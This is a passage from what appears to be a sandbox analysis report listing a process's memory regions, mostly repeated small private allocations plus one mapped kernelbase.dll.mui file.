0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 753 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 754 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 755 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 756 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 757 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 758 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 759 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 760 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 761 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 762 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 763 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 764 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 765 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 766 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 767 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 768 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 769 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 770 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 771 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 772 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 773 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 774 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 775 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 776 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 777 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 778 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 779 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 780 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 781 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 782 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 783 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 784 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 785 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 786 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 787 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 788 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 789 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 790 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 791 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 792 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 793 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 794 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 795 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 796 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 797 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 798 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 799 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 800 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 801 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 802 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 803 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 804 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 805 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 806 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 807 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 808 start_va = 0x3600000 end_va = 0x3700fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 809 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 810 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 811 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 812 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 813 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 814 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 815 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 816 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 817 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 818 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 819 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 820 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 821 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 822 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 823 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 824 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 825 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 826 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 827 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 828 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 829 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 830 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 831 start_va = 0x3600000 end_va = 0x3700fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 832 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 833 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 834 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 835 start_va = 0x35f0000 end_va = 0x35f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 836 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 837 start_va = 0x3600000 end_va = 0x3600fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 838 start_va = 0x3600000 end_va = 0x3700fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 839 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 840 start_va = 0x3710000 end_va = 0x37eefff entry_point = 0x3710000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 841 start_va = 0x37f0000 end_va = 0x37f1fff entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 842 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 843 start_va = 0x3000000 end_va = 0x3000fff entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 844 start_va = 0x3000000 end_va = 0x3000fff entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 845 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 846 start_va = 0x3010000 end_va = 0x3010fff entry_point = 0x0 region_type = private name = "private_0x0000000003010000" filename = "" Region: id = 847 start_va = 0x35f0000 end_va = 0x36f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 848 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 849 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 850 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 851 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 852 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 853 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 854 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 855 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 856 start_va = 0x35f0000 end_va = 0x36f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 857 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 858 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 859 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 860 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 861 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 862 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 863 start_va = 0x35f0000 end_va = 0x36f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 864 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 865 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 866 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 867 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 868 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 869 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 870 start_va = 0x35f0000 end_va = 0x36f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 871 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 872 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 873 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 874 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 875 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 876 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 877 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 878 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 879 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 880 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 881 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 882 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 883 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 884 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 885 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 886 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 887 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 888 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 889 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 890 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 891 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 892 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 893 start_va = 0x35f0000 end_va = 0x36f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 894 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 895 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 896 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 897 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 898 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 899 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 900 start_va = 0x35f0000 end_va = 0x36f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 901 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 902 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 903 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 904 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 905 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 906 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 907 start_va = 0x35f0000 end_va = 0x36f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 908 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 909 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 910 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 911 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 912 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 913 start_va = 0x2f40000 end_va = 0x2f40fff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 914 start_va = 0x35f0000 end_va = 0x36f0fff entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 915 start_va = 0x3870000 end_va = 0x3970fff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 916 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 917 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 918 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 919 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 920 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 921 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 922 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 923 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 924 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 925 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 926 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 927 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 928 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 929 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 930 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 931 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 932 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 933 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 934 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 935 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 936 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 937 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 938 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 939 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 940 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 941 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 942 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 943 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 944 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 945 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 946 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 947 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 948 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 949 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 950 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 951 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 952 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 953 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 954 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 955 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 956 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 957 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 958 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 959 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 960 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 961 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 962 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 963 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 964 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 965 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 966 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 967 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 968 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 969 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 970 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 971 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 972 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 973 start_va = 0x2f30000 end_va = 0x2f30fff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 974 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 975 start_va = 0x2f30000 end_va = 